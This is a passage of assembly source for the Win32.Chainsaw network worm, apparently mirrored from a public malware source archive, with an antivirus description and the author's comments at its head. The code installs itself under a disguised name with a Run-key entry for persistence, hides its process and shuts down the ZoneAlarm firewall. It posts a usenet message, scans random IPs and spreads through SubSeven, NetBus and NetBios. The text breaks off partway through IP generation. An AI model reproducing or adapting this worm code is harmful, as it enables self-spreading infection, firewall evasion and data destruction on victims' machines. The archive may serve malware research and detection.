mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2025-01-12 05:15:28 +00:00
1599 lines
61 KiB
NASM
1599 lines
61 KiB
NASM
|
|
|||
|
<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>[CHAINSAW.ASM]<EFBFBD><EFBFBD><EFBFBD>
|
|||
|
; AVP description.
|
|||
|
; ---------------------------------------------------------------------------
|
|||
|
; Worm.Chainsaw
|
|||
|
;
|
|||
|
; This is a network worm with Internet spreading ability. When the worm
|
|||
|
; is run on a system for the first time, it installs itself. To do that it
|
|||
|
; copies itself to the Windows system directory using the filename
|
|||
|
; WINMINE.EXE and also to the root directory of the current drive using the
|
|||
|
; filename CHAINSAW.EXE. The latter file then gets "hidden" attribute set.
|
|||
|
; The worm then registers itself in the system registry, auto-run key:
|
|||
|
;
|
|||
|
; HKCU\Software\Microsoft\Windows\CurrentVersion\Run
|
|||
|
; Mines = path\WINMINE.EXE
|
|||
|
;
|
|||
|
; where "path" is the Windows system directory name. The worm then exits and
|
|||
|
; triggers its infection routines when run during the next Windows startup.
|
|||
|
;
|
|||
|
; During the next Windows startup the worm is automatically executed by
|
|||
|
; Windows by an auto-run key in the system registry. The worm then registers
|
|||
|
; itself as hidden application and runs its spreading routine. That routine
|
|||
|
; enumerates shared drives on the local networks [* It doesn't even get near
|
|||
|
; local shares. *], gets the Windows directory on a drive (if there is one),
|
|||
|
; copies itself to there using the filename CHAINSAW.EXE (if the drive is
|
|||
|
; mapped for full access) and registers itself in there by writing the "Run="
|
|||
|
; instruction to the [windows] section of the WIN.INI file on the remote
|
|||
|
; drive. During the next Windows restart the worm copy will be activated and
|
|||
|
; will complete the infection.
|
|||
|
;
|
|||
|
; When the worm is started it sends a notifying message to the
|
|||
|
; "alt.horror" conference. The message has the fields:
|
|||
|
;
|
|||
|
; From: "Leatherface" <hacked.up.for@bbq.net>
|
|||
|
; Subject: CHAINSAWED
|
|||
|
; Newsgroups: alt.horror
|
|||
|
; Message body:
|
|||
|
;
|
|||
|
; WHO WILL SURVIVE
|
|||
|
; AND WHAT WILL BE LEFT OF THEM?
|
|||
|
;
|
|||
|
; The worm also tries to send its copies to remote machines. To do that it
|
|||
|
; gets randomly selected IP addresses in an endless loop and tries to connect
|
|||
|
; to them. If it succeeds the worm tries to connect to a "Backdoor" trojan
|
|||
|
; program on the remote machine (if the machine is infected by a backdoor
|
|||
|
; program). After successfully connecting, the worm sends its copy to the
|
|||
|
; remote machine and forces the Backdoor to execute it there. The list of
|
|||
|
; "supported" Backdoors is as follows: Sub7, NetBus, NetBios. It's obvious
|
|||
|
; that the worm has a very low chance to spread itself in such a way [*
|
|||
|
; Several worms such as VBS/NetLog and W32/Qaz use *only* NetBios to spread,
|
|||
|
; and are currently in the wild in large numbers, try to explain me this
|
|||
|
; then. *]
|
|||
|
;
|
|||
|
; Depending on the system date the worm also sends a "Deny-of-service"
|
|||
|
; packet to a randomly selected IP address. That packet is prepared so that
|
|||
|
; it may cause a remote Win9x machine to crash (because of a bug in Win9x
|
|||
|
; libraries). The worm intends to do that on the 31th of the month, but
|
|||
|
; because of a bug compares that value with "year" field, and as a result
|
|||
|
; will bomb random selected machines only if tje system date is set to the
|
|||
|
; year 0031 [* Oops! Well atleast this version has it fixed :*]
|
|||
|
;
|
|||
|
; The worm also disables the "ZoneAlarm" Internet protection utility.
|
|||
|
;
|
|||
|
; Depending on its random counter the worm spawns a trojan program that
|
|||
|
; erases data on the hard drive by writing the text to there:
|
|||
|
;
|
|||
|
; "THE FILM WHICH YOU ARE ABOUT TO SEE IS AN ACCOUNT OF THE
|
|||
|
; TRAGEDY WHICH BEFELL A GROUP OF FIVE YOUTHS. IN PARTICULAR
|
|||
|
; SALLY HARDESTY AND HER INVALID BROTHER FRANKLIN. IT IS ALL
|
|||
|
; THE MORE TRAGIC IN THAT THEY WERE YOUNG. BUT, HAD THEY
|
|||
|
; LIVED VERY, VERY LONG LIVES, THEY COULD NOT HAVE EXPECTED
|
|||
|
; NOR WOULD THEY HAVE WISHED TO SEE AS MUCH OF THE MAD AND
|
|||
|
; MACABRE AS THEY WERE TO SEE THAT DAY. FOR THEM AN IDYLLIC
|
|||
|
; SUMMER AFTERNOON DRIVE BECAME A NIGHTMARE. THE EVENTS OF
|
|||
|
; THAT DAY WERE TO LEAD TO THE DISCOVERY OF ONE OF THE MOST
|
|||
|
; BIZARRE CRIMES IN THE ANNALS OF AMERICAN HISTORY,
|
|||
|
; THE TEXAS CHAIN SAW MASSACRE..."
|
|||
|
; ---------------------------------------------------------------------------
|
|||
|
|
|||
|
;============================================================================
|
|||
|
;
|
|||
|
;
|
|||
|
; NAME: Win32.Chainsaw v1.01
|
|||
|
; TYPE: NetBios/SubSeven/NetBus worm.
|
|||
|
; DATE: July - September 2000.
|
|||
|
; AUTHOR: T-2000 / Immortal Riot.
|
|||
|
; E-MAIL: T2000_@hotmail.com
|
|||
|
; PAYLOAD: Sector trashing.
|
|||
|
;
|
|||
|
; FEATURES:
|
|||
|
;
|
|||
|
; - Disables ZoneAlarm firewall.
|
|||
|
; - Not visible in 9x tasklist.
|
|||
|
; - Sends usenet message on installation.
|
|||
|
; - DoS'es random hosts on 31st of any month.
|
|||
|
; - Anti-debugging code.
|
|||
|
;
|
|||
|
; Randomly scans the Internet for hosts running either SubSeven 2, NetBus 1,
|
|||
|
; or NetBios, and then installs itself in the systems it can get access
|
|||
|
; to. It's main payload is to IGMP DoS random Internet hosts on every 31st
|
|||
|
; of the month, which will BSOD every released version of Windoze 95/98
|
|||
|
; that isn't patched or firewalled.
|
|||
|
;
|
|||
|
;============================================================================
|
|||
|
|
|||
|
; I've kept the code clear and understandable for everyone, no optimizations
|
|||
|
; of any kind, mainly due the file alignment, the filesize will usually just
|
|||
|
; stay the same wether your code is optimized or not.
|
|||
|
|
|||
|
.386
|
|||
|
.MODEL FLAT
|
|||
|
.DATA
|
|||
|
|
|||
|
JUMPS
|
|||
|
|
|||
|
; Converts a little indian word to a big indian word.
|
|||
|
DWBI MACRO Lil_Indian
|
|||
|
DW (Lil_Indian SHR 8) + ((Lil_Indian AND 00FFh) SHL 8)
|
|||
|
ENDM
|
|||
|
|
|||
|
|
|||
|
EXTRN WSAGetLastError:PROC
|
|||
|
EXTRN ioctlsocket:PROC
|
|||
|
EXTRN ExitProcess:PROC
|
|||
|
EXTRN WSAStartup:PROC
|
|||
|
EXTRN WritePrivateProfileStringA:PROC
|
|||
|
EXTRN WSACleanup:PROC
|
|||
|
EXTRN socket:PROC
|
|||
|
EXTRN closesocket:PROC
|
|||
|
EXTRN setsockopt:PROC
|
|||
|
EXTRN InternetGetConnectedState:PROC
|
|||
|
EXTRN DeleteFileA:PROC
|
|||
|
EXTRN connect:PROC
|
|||
|
EXTRN setsockopt:PROC
|
|||
|
EXTRN PeekMessageA:PROC
|
|||
|
EXTRN SetFileAttributesA:PROC
|
|||
|
EXTRN GetSystemDirectoryA:PROC
|
|||
|
EXTRN CreateFileA:PROC
|
|||
|
EXTRN recv:PROC
|
|||
|
EXTRN send:PROC
|
|||
|
EXTRN sendto:PROC
|
|||
|
EXTRN CloseHandle:PROC
|
|||
|
EXTRN GetSystemTime:PROC
|
|||
|
EXTRN GetModuleHandle
|
|||
|
EXTRN RegOpenKeyExA:PROC
|
|||
|
EXTRN RegSetValueExA:PROC
|
|||
|
EXTRN RegCloseKey:PROC
|
|||
|
EXTRN ReadFile:PROC
|
|||
|
EXTRN CopyFileA:PROC
|
|||
|
EXTRN WNetAddConnection2A:PROC
|
|||
|
EXTRN WNetCancelConnection2A:PROC
|
|||
|
EXTRN SetErrorMode:PROC
|
|||
|
EXTRN GetModuleFileNameA:PROC
|
|||
|
EXTRN FindWindowA:PROC
|
|||
|
EXTRN PostMessageA:PROC
|
|||
|
EXTRN GetTickCount:PROC
|
|||
|
EXTRN WriteFile:PROC
|
|||
|
EXTRN GetLocalTime:PROC
|
|||
|
EXTRN WinExec:PROC
|
|||
|
EXTRN select:PROC
|
|||
|
EXTRN GetPrivateProfileStringA:PROC
|
|||
|
EXTRN GetModuleHandleA:PROC
|
|||
|
EXTRN GetProcAddress:PROC
|
|||
|
EXTRN WNetAddConnection2A:PROC
|
|||
|
EXTRN WNetEnumResourceA:PROC
|
|||
|
EXTRN WNetOpenEnumA:PROC
|
|||
|
EXTRN WNetCloseEnum:PROC
|
|||
|
EXTRN RegQueryValueExA:PROC
|
|||
|
EXTRN gethostbyname:PROC
|
|||
|
EXTRN inet_ntoa:PROC
|
|||
|
|
|||
|
|
|||
|
Worm_Size EQU 6144
|
|||
|
|
|||
|
SEM_NOGPFAULTERRORBOX EQU 00000002h
|
|||
|
OPEN_EXISTING EQU 00000003h
|
|||
|
CREATE_ALWAYS EQU 00000002h
|
|||
|
SO_SNDTIMEO EQU 1005h
|
|||
|
SO_RCVTIMEO EQU 1006h
|
|||
|
RESOURCE_GLOBALNET EQU 00000002h
|
|||
|
RESOURCEUSAGE_CONNECTABLE EQU 00000001h
|
|||
|
RESOURCEUSAGE_CONTAINER EQU 00000002h
|
|||
|
RESOURCEUSAGE_CONNECTABLE EQU 00000001h
|
|||
|
RESOURCETYPE_DISK EQU 00000001h
|
|||
|
SOL_SOCKET EQU 0FFFFh
|
|||
|
HKEY_CURRENT_USER EQU 80000001h
|
|||
|
KEY_QUERY_VALUE EQU 1
|
|||
|
KEY_WRITE EQU 00020006h
|
|||
|
REG_SZ EQU 00000001h
|
|||
|
GENERIC_READ EQU 80000000h
|
|||
|
GENERIC_WRITE EQU 40000000h
|
|||
|
FILE_SHARE_READ EQU 00000001h
|
|||
|
FILE_ATTRIBUTE_HIDDEN EQU 2
|
|||
|
AF_INET EQU 2
|
|||
|
IPPROTO_IGMP EQU 2
|
|||
|
SOCK_STREAM EQU 1
|
|||
|
SOCK_RAW EQU 3
|
|||
|
FIONBIO EQU 8004667Eh
|
|||
|
WM_QUIT EQU 0012h
|
|||
|
|
|||
|
|
|||
|
S7_Upload_Req DB 'RTFChainsaw.exe'
|
|||
|
End_S7_Upload_Req:
|
|||
|
|
|||
|
S7_Upload_Size DB 'SFT046144'
|
|||
|
End_S7_Upload_Size:
|
|||
|
|
|||
|
S7_Exec_Req DB 'FMXChainsaw.exe'
|
|||
|
End_S7_Exec_Req:
|
|||
|
|
|||
|
NB_Password DB 'Password;1;netbus', 0Dh
|
|||
|
End_NB_Password:
|
|||
|
|
|||
|
NB_Upload_Req DB 'UploadFile;Chainsaw.exe;6144;\', 0Dh
|
|||
|
End_NB_Upload_Req:
|
|||
|
|
|||
|
NB_Exec_File DB 'StartApp;\Chainsaw.exe', 0Dh
|
|||
|
End_NB_Exec_File:
|
|||
|
|
|||
|
Nuke_File DB 'BBQ666.COM', 0
|
|||
|
|
|||
|
sz_Kernel32 DB 'KERNEL32', 0
|
|||
|
sz_RegServProc DB 'RegisterServiceProcess', 0
|
|||
|
|
|||
|
Win_Ini_Run_Key DB 'run', 0
|
|||
|
Windows_Section DB 'windows', 0
|
|||
|
|
|||
|
Run_Key DB 'Software\Microsoft\Windows\CurrentVersion\Run', 0
|
|||
|
ZoneAlarm_Window DB 'ZoneAlarm', 0
|
|||
|
|
|||
|
Reg_Handle_1 DD 0
|
|||
|
Reg_Handle_2 DD 0
|
|||
|
sz_Account_Mgr DB 'Software\Microsoft\Internet Account Manager', 0
|
|||
|
Account_Key DB 'Software\Microsoft\Internet Account Manager\Accounts\'
|
|||
|
Account_Index DB '00000000', 0
|
|||
|
sz_Def_News_Acc DB 'Default News Account', 0
|
|||
|
sz_NNTP_Server DB 'NNTP Server', 0
|
|||
|
|
|||
|
Size_Acc_Buffer DD 9
|
|||
|
Size_NNTP_Buf DD 128
|
|||
|
|
|||
|
s_POST DB 'POST', 0Dh, 0Ah
|
|||
|
s_QUIT DB 'QUIT', 0Dh, 0Ah
|
|||
|
|
|||
|
; Header.
|
|||
|
|
|||
|
News_Message: DB 'From: "Leatherface" <hacked.up.for@bbq.net>', 0Dh, 0Ah
|
|||
|
DB 'Subject: CHAINSAWED', 0Dh, 0Ah
|
|||
|
DB 'Newsgroups: alt.horror', 0Dh, 0Ah
|
|||
|
DB 0Dh, 0Ah
|
|||
|
|
|||
|
; Body.
|
|||
|
|
|||
|
DB 'WHO WILL SURVIVE', 0Dh, 0Ah
|
|||
|
DB 'AND WHAT WILL BE LEFT OF THEM?', 0Dh, 0Ah
|
|||
|
|
|||
|
; End-of-data command.
|
|||
|
|
|||
|
DB '.', 0Dh, 0Ah
|
|||
|
End_News_Message:
|
|||
|
|
|||
|
MsDos_Sys DB 'T:\MSDOS.SYS', 0
|
|||
|
Win_Dir_Key DB 'WinDir', 0
|
|||
|
Paths_Section DB 'Paths', 0
|
|||
|
|
|||
|
Slash_Win_Ini DB '\'
|
|||
|
Win_Ini DB 'WIN.INI', 0
|
|||
|
|
|||
|
Remote_Drive DB 'T:', 0
|
|||
|
Cover_Name DB '\WINMINE.EXE', 0
|
|||
|
|
|||
|
Remote_Trojan DB 'T:'
|
|||
|
Root_Dropper DB '\Chainsaw.exe', 0
|
|||
|
Run_Key_Name DB 'Mines', 0
|
|||
|
|
|||
|
Boole_False DD 0
|
|||
|
Boole_True DD 1
|
|||
|
|
|||
|
NetBios_Remote DB '\\666.666.666.666', 0
|
|||
|
|
|||
|
Time_Out: DD 1 ; - Seconds.
|
|||
|
DD 500 ; - Milliseconds.
|
|||
|
|
|||
|
IO_Time_Out DD 5000
|
|||
|
|
|||
|
Usenet_Conn: DW AF_INET ; connect() structures.
|
|||
|
DWBI 119
|
|||
|
Usenet_IP DD 0
|
|||
|
DB 8 DUP(0)
|
|||
|
|
|||
|
Nuke_Conn: DW AF_INET
|
|||
|
DW 0
|
|||
|
Nuke_IP DD 0
|
|||
|
DB 8 DUP(0)
|
|||
|
|
|||
|
Sub7_Conn: DW AF_INET
|
|||
|
DWBI 27374
|
|||
|
Sub7_IP DD 0
|
|||
|
DB 8 DUP(0)
|
|||
|
|
|||
|
NetBus_Conn: DW AF_INET
|
|||
|
DWBI 12345
|
|||
|
NetBus_IP DD 0
|
|||
|
DB 8 DUP(0)
|
|||
|
|
|||
|
NetBus_Conn_2: DW AF_INET
|
|||
|
DWBI (12345+1)
|
|||
|
NetBus_IP_2 DD 0
|
|||
|
DB 8 DUP(0)
|
|||
|
|
|||
|
NetBios_Conn: DW AF_INET
|
|||
|
DWBI 139
|
|||
|
NetBios_IP DD 0
|
|||
|
DB 8 DUP(0)
|
|||
|
|
|||
|
Win_Dir DB 260 DUP(0)
|
|||
|
Default_String DB 0
|
|||
|
|
|||
|
Own_Path DB 260 DUP(0)
|
|||
|
|
|||
|
Net_Struc_Count DD 1
|
|||
|
Enum_Buf_Size DD 666
|
|||
|
Enum_Buffer DB 666 DUP(0)
|
|||
|
|
|||
|
Net_Resource_Struc:
|
|||
|
|
|||
|
DD 0
|
|||
|
DD 0
|
|||
|
DD 0
|
|||
|
DD 0
|
|||
|
DD 0
|
|||
|
DD OFFSET NetBios_Remote
|
|||
|
DD 0
|
|||
|
DD 0
|
|||
|
|
|||
|
Net_Resource: DD 0
|
|||
|
DD 0
|
|||
|
DD 0
|
|||
|
Net_Usage DD 0
|
|||
|
Net_Local_Name DD 0
|
|||
|
Net_Remote_Name DD 0
|
|||
|
DD 0
|
|||
|
DD 0
|
|||
|
|
|||
|
Select_Struc:
|
|||
|
Sock_Count DD 3
|
|||
|
Sub7_Socket DD 0
|
|||
|
NetBus_Socket DD 0
|
|||
|
NetBios_Socket DD 0
|
|||
|
|
|||
|
IGMP_Socket DD 0
|
|||
|
News_Socket DD 0
|
|||
|
NetBus_Socket_2 DD 0
|
|||
|
|
|||
|
Connect_Select: DD 4 DUP(0)
|
|||
|
|
|||
|
IGMP_Nuke DB 15000 DUP(0)
|
|||
|
|
|||
|
Temp DD 0
|
|||
|
Random_Init DD 0
|
|||
|
|
|||
|
Enum_Handle DD 0
|
|||
|
|
|||
|
Size_Cover_Path DD 0
|
|||
|
|
|||
|
System_Time DW 8 DUP(0)
|
|||
|
|
|||
|
Worm_Code DB Worm_Size DUP(0)
|
|||
|
WSA_Data DB 400 DUP(0)
|
|||
|
System_Dir DB 260 DUP(0)
|
|||
|
NNTP_Server DB 128 DUP(0)
|
|||
|
Buffer DB 512 DUP(0)
|
|||
|
|
|||
|
.CODE
|
|||
|
|
|||
|
DB '[-T2IR-]', 0
|
|||
|
START:
|
|||
|
PUSH SEM_NOGPFAULTERRORBOX ; On error just bail out
|
|||
|
CALL SetErrorMode ; without displaying shit.
|
|||
|
|
|||
|
PUSH 0 ; Fake a dispatch to get the
|
|||
|
PUSH 0 ; hourglass cursor to
|
|||
|
PUSH 0 ; disappear.
|
|||
|
PUSH 0
|
|||
|
PUSH 0
|
|||
|
CALL PeekMessageA
|
|||
|
|
|||
|
; Get offset of CreateFileA in the jump table.
|
|||
|
|
|||
|
MOV ESI, DWORD PTR CreateFileA+2
|
|||
|
LODSD
|
|||
|
|
|||
|
; Soft-Ice's BPX command works with 0CCh breakpoints
|
|||
|
; to hook API's, so here we simply check if a common
|
|||
|
; API has been hooked and kill the system if true.
|
|||
|
; For a virus it's better to check every fetched API
|
|||
|
; for a debugger hook.
|
|||
|
|
|||
|
CMP BYTE PTR [ESI], 0CCh ; Debugger has a hook on it?
|
|||
|
JE Payload
|
|||
|
|
|||
|
CALL GetTickCount
|
|||
|
|
|||
|
MOV Random_Init, EAX
|
|||
|
|
|||
|
PUSH 260 ; Get the path to ourself.
|
|||
|
PUSH OFFSET Own_Path
|
|||
|
PUSH 0
|
|||
|
CALL GetModuleFileNameA
|
|||
|
|
|||
|
MOV EDI, OFFSET System_Dir
|
|||
|
|
|||
|
PUSH 260 ; Get the System directory.
|
|||
|
PUSH EDI
|
|||
|
CALL GetSystemDirectoryA
|
|||
|
|
|||
|
MOV ESI, OFFSET Cover_Name
|
|||
|
ADD EDI, EAX
|
|||
|
|
|||
|
MOVSD ; Append our cover name
|
|||
|
MOVSD ; \WINMINE.EXE to it.
|
|||
|
MOVSD
|
|||
|
MOVSB
|
|||
|
|
|||
|
SUB EDI, OFFSET System_Dir ; Save size of path.
|
|||
|
MOV Size_Cover_Path, EDI
|
|||
|
|
|||
|
PUSH 1 ; Copy us to the system
|
|||
|
PUSH OFFSET System_Dir ; directory under the cover
|
|||
|
PUSH OFFSET Own_Path ; name.
|
|||
|
CALL CopyFileA
|
|||
|
|
|||
|
XCHG ECX, EAX ; Virus is already installed?
|
|||
|
JECXZ Check_Trigger
|
|||
|
|
|||
|
PUSH 1 ; Copy root dropper to root
|
|||
|
PUSH OFFSET Root_Dropper ; to indicate this is the 1st
|
|||
|
PUSH OFFSET Own_Path ; run of the worm.
|
|||
|
CALL CopyFileA
|
|||
|
|
|||
|
PUSH FILE_ATTRIBUTE_HIDDEN ; Hide it.
|
|||
|
PUSH OFFSET Root_Dropper
|
|||
|
CALL SetFileAttributesA
|
|||
|
|
|||
|
PUSH OFFSET Reg_Handle_1 ; Open up a handle to the
|
|||
|
PUSH KEY_WRITE ; registry Run key.
|
|||
|
PUSH 0
|
|||
|
PUSH OFFSET Run_Key
|
|||
|
PUSH HKEY_CURRENT_USER
|
|||
|
CALL RegOpenKeyExA
|
|||
|
|
|||
|
PUSH Size_Cover_Path ; Make the cover file run
|
|||
|
PUSH OFFSET System_Dir ; every bootup.
|
|||
|
PUSH REG_SZ
|
|||
|
PUSH 0
|
|||
|
PUSH OFFSET Run_Key_Name
|
|||
|
PUSH Reg_Handle_1
|
|||
|
CALL RegSetValueExA
|
|||
|
|
|||
|
PUSH Reg_Handle_1 ; Close registry key.
|
|||
|
CALL RegCloseKey
|
|||
|
|
|||
|
PUSH OFFSET Win_Ini ; Remove temporary reference
|
|||
|
PUSH 0 ; to virus dropper in
|
|||
|
PUSH OFFSET Win_Ini_Run_Key ; WIN.INI.
|
|||
|
PUSH OFFSET Windows_Section
|
|||
|
CALL WritePrivateProfileStringA
|
|||
|
|
|||
|
Exit: PUSH 0
|
|||
|
CALL ExitProcess
|
|||
|
|
|||
|
Check_Trigger: MOV EAX, 666 ; 1/666 chance of activating.
|
|||
|
CALL Random_EAX
|
|||
|
|
|||
|
DEC EAX ; Today is trashday?
|
|||
|
JZ Payload
|
|||
|
|
|||
|
PUSH 0 ; Open ourselves.
|
|||
|
PUSH 0
|
|||
|
PUSH OPEN_EXISTING
|
|||
|
PUSH 0
|
|||
|
PUSH FILE_SHARE_READ
|
|||
|
PUSH GENERIC_READ
|
|||
|
PUSH OFFSET Own_Path
|
|||
|
CALL CreateFileA
|
|||
|
|
|||
|
MOV EBX, EAX
|
|||
|
|
|||
|
INC EAX
|
|||
|
JZ Exit
|
|||
|
|
|||
|
PUSH 0 ; Read in ourselves.
|
|||
|
PUSH OFFSET Temp
|
|||
|
PUSH Worm_Size+1
|
|||
|
PUSH OFFSET Worm_Code
|
|||
|
PUSH EBX
|
|||
|
CALL ReadFile
|
|||
|
|
|||
|
CMP Temp, Worm_Size ; Wormsize has changed?
|
|||
|
JNE Payload ; Then we're likely
|
|||
|
; incomplete or infected
|
|||
|
; with a virus.
|
|||
|
|
|||
|
PUSH EBX ; Close ourselves again.
|
|||
|
CALL CloseHandle
|
|||
|
|
|||
|
PUSH OFFSET sz_Kernel32 ; Get base of KERNEL32.DLL.
|
|||
|
CALL GetModuleHandleA
|
|||
|
|
|||
|
PUSH OFFSET sz_RegServProc ; Get RegisterServiceProcess.
|
|||
|
PUSH EAX
|
|||
|
CALL GetProcAddress
|
|||
|
|
|||
|
XCHG ECX, EAX
|
|||
|
JECXZ Init_Winsock
|
|||
|
|
|||
|
PUSH 1 ; Register our process as a
|
|||
|
PUSH 0 ; hidden service.
|
|||
|
CALL ECX
|
|||
|
|
|||
|
Init_Winsock: PUSH OFFSET WSA_Data ; Initialize winsock.
|
|||
|
PUSH 0202h
|
|||
|
CALL WSAStartup
|
|||
|
|
|||
|
OR EAX, EAX ; Error?
|
|||
|
JNZ Exit
|
|||
|
|
|||
|
Chk_Inet_State: PUSH 0 ; We're connected to the
|
|||
|
PUSH OFFSET Temp ; Internet?
|
|||
|
CALL InternetGetConnectedState
|
|||
|
|
|||
|
DEC EAX ; Else just loop and check
|
|||
|
JNZ Chk_Inet_State ; again until we are.
|
|||
|
|
|||
|
; Here we close the ZoneAlarm firewall if it is
|
|||
|
; found active, reason being that A) it will pop-up
|
|||
|
; a warning box whenever a program (ie. our worm)
|
|||
|
; is attempting to access the Internet, (this is how
|
|||
|
; many RAT trojans get caught these days) and B) it
|
|||
|
; is likely to block our ports.
|
|||
|
|
|||
|
PUSH OFFSET ZoneAlarm_Window ; Attempt to locate the
|
|||
|
PUSH 0 ; ZoneAlarm window.
|
|||
|
CALL FindWindowA
|
|||
|
|
|||
|
XCHG ECX, EAX
|
|||
|
JECXZ Check_1st_Run
|
|||
|
|
|||
|
PUSH 0 ; Tell ZoneAlarm to quit.
|
|||
|
PUSH 0
|
|||
|
PUSH WM_QUIT
|
|||
|
PUSH ECX
|
|||
|
CALL PostMessageA
|
|||
|
|
|||
|
Check_1st_Run: PUSH OFFSET Root_Dropper ; Can we delete the root
|
|||
|
CALL DeleteFileA ; dropper?
|
|||
|
|
|||
|
XCHG ECX, EAX
|
|||
|
JECXZ Do_Random_IP
|
|||
|
|
|||
|
; This is the first Internet run of the worm, so
|
|||
|
; send a usenet message to alt.horror to note
|
|||
|
; our presence. Better to just use a public
|
|||
|
; dump place instead of e-mail for example, this
|
|||
|
; way they can't track you or kill the account.
|
|||
|
|
|||
|
PUSH OFFSET Reg_Handle_1 ; Open a handle to Internet
|
|||
|
PUSH KEY_QUERY_VALUE ; Account Manager.
|
|||
|
PUSH 0
|
|||
|
PUSH OFFSET sz_Account_Mgr
|
|||
|
PUSH HKEY_CURRENT_USER
|
|||
|
CALL RegOpenKeyExA
|
|||
|
|
|||
|
OR EAX, EAX
|
|||
|
JNZ Do_Random_IP
|
|||
|
|
|||
|
PUSH OFFSET Size_Acc_Buffer ; Get default news account.
|
|||
|
PUSH OFFSET Account_Index
|
|||
|
PUSH 0
|
|||
|
PUSH 0
|
|||
|
PUSH OFFSET sz_Def_News_Acc
|
|||
|
PUSH Reg_Handle_1
|
|||
|
CALL RegQueryValueExA
|
|||
|
|
|||
|
OR EAX, EAX
|
|||
|
JNZ Close_Reg_1
|
|||
|
|
|||
|
PUSH OFFSET Reg_Handle_2 ; Open the default news
|
|||
|
PUSH KEY_QUERY_VALUE ; account.
|
|||
|
PUSH 0
|
|||
|
PUSH OFFSET Account_Key
|
|||
|
PUSH HKEY_CURRENT_USER
|
|||
|
CALL RegOpenKeyExA
|
|||
|
|
|||
|
OR EAX, EAX
|
|||
|
JNZ Close_Reg_1
|
|||
|
|
|||
|
PUSH OFFSET Size_NNTP_Buf ; Get it's NNTP server.
|
|||
|
PUSH OFFSET NNTP_Server
|
|||
|
PUSH 0
|
|||
|
PUSH 0
|
|||
|
PUSH OFFSET sz_NNTP_Server
|
|||
|
PUSH Reg_Handle_2
|
|||
|
CALL RegQueryValueExA
|
|||
|
|
|||
|
OR EAX, EAX
|
|||
|
JNZ Close_Reg_2
|
|||
|
|
|||
|
PUSH OFFSET NNTP_Server ; Convert the DNS-name to
|
|||
|
CALL gethostbyname ; an IP-address.
|
|||
|
|
|||
|
XCHG ECX, EAX
|
|||
|
JECXZ Close_Reg_2
|
|||
|
|
|||
|
MOV ESI, [ECX+12] ; Fetch IP-address.
|
|||
|
LODSD
|
|||
|
PUSH DWORD PTR [EAX]
|
|||
|
POP Usenet_IP
|
|||
|
|
|||
|
PUSH 0
|
|||
|
PUSH SOCK_STREAM
|
|||
|
PUSH AF_INET
|
|||
|
CALL socket
|
|||
|
|
|||
|
MOV News_Socket, EAX
|
|||
|
|
|||
|
INC EAX ; Error?
|
|||
|
JZ Close_Reg_2
|
|||
|
|
|||
|
MOV EBX, News_Socket
|
|||
|
CALL Set_Time_Outs
|
|||
|
|
|||
|
PUSH 16
|
|||
|
PUSH OFFSET Usenet_Conn
|
|||
|
PUSH News_Socket
|
|||
|
CALL connect
|
|||
|
|
|||
|
INC EAX
|
|||
|
JZ Close_Reg_2
|
|||
|
|
|||
|
MOV EDI, OFFSET Buffer
|
|||
|
|
|||
|
PUSH 0 ; Receive data from the
|
|||
|
PUSH 512 ; socket.
|
|||
|
PUSH EDI
|
|||
|
PUSH News_Socket
|
|||
|
CALL recv
|
|||
|
|
|||
|
INC EAX
|
|||
|
JZ Close_News
|
|||
|
|
|||
|
CMP BYTE PTR [EDI], '2'
|
|||
|
JNE Send_QUIT
|
|||
|
|
|||
|
PUSH 0
|
|||
|
PUSH 6
|
|||
|
PUSH OFFSET s_POST
|
|||
|
PUSH News_Socket
|
|||
|
CALL send
|
|||
|
|
|||
|
INC EAX
|
|||
|
JZ Close_News
|
|||
|
|
|||
|
PUSH 0 ; Receive data from the
|
|||
|
PUSH 512 ; socket.
|
|||
|
PUSH EDI
|
|||
|
PUSH News_Socket
|
|||
|
CALL recv
|
|||
|
|
|||
|
INC EAX
|
|||
|
JZ Close_News
|
|||
|
|
|||
|
CMP BYTE PTR [EDI], '3'
|
|||
|
JNE Send_QUIT
|
|||
|
|
|||
|
PUSH 0
|
|||
|
PUSH (End_News_Message-News_Message)
|
|||
|
PUSH OFFSET News_Message
|
|||
|
PUSH News_Socket
|
|||
|
CALL send
|
|||
|
|
|||
|
INC EAX
|
|||
|
JZ Close_News
|
|||
|
|
|||
|
PUSH 0 ; Receive data from the
|
|||
|
PUSH 512 ; socket.
|
|||
|
PUSH EDI
|
|||
|
PUSH News_Socket
|
|||
|
CALL recv
|
|||
|
|
|||
|
INC EAX
|
|||
|
JZ Close_News
|
|||
|
|
|||
|
Send_QUIT: PUSH 0
|
|||
|
PUSH 6
|
|||
|
PUSH OFFSET s_QUIT
|
|||
|
PUSH News_Socket
|
|||
|
CALL send
|
|||
|
|
|||
|
INC EAX
|
|||
|
JZ Close_News
|
|||
|
|
|||
|
PUSH 0 ; Receive data from the
|
|||
|
PUSH 512 ; socket.
|
|||
|
PUSH EDI
|
|||
|
PUSH News_Socket
|
|||
|
CALL recv
|
|||
|
|
|||
|
Close_News: PUSH News_Socket
|
|||
|
CALL closesocket
|
|||
|
|
|||
|
Close_Reg_2: PUSH Reg_Handle_2
|
|||
|
CALL RegCloseKey
|
|||
|
|
|||
|
Close_Reg_1: PUSH Reg_Handle_1
|
|||
|
CALL RegCloseKey
|
|||
|
|
|||
|
Do_Random_IP: CALL Random_AL_254 ; Get random octet (1-254).
|
|||
|
|
|||
|
XCHG EBX, EAX
|
|||
|
|
|||
|
CALL Random_AL_254 ; Another one.
|
|||
|
|
|||
|
SHL EBX, 8
|
|||
|
MOV BL, AL
|
|||
|
|
|||
|
CALL Random_AL_254 ; And another one.
|
|||
|
|
|||
|
SHL EBX, 8
|
|||
|
MOV BL, AL
|
|||
|
|
|||
|
